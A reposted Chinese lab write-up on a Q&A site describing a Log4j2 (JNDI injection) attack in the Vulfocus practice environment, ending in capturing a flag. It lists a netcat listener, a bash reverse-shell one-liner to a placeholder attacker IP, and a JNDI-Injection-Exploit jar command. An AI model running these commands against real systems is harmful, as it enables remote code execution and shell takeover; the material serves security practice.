欢迎您访问365答案网,请分享给你的朋友!
生活常识 学习资料

【安全攻防实验-5】Vulfocus练习-log4j2攻击

时间:2023-07-04
1、VPS打开监听

nc -lvvp 4444#顺便写个payloadbash -i >& /dev/tcp/your-ip/8888 0>&1

2、payload转化

java.lang.Runtime.exec() Payload Workarounds - @Jackson_T

准备真正的payload

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "上面的payload" -A "your-ip"

打开JNDI-监听

 获得flag

 

 

  

Copyright © 2016-2020 www.365daan.com All Rights Reserved. 365答案网 版权所有 备案号:

部分内容来自互联网,版权归原作者所有,如有冒犯请联系我们,我们将在三个工作时内妥善处理。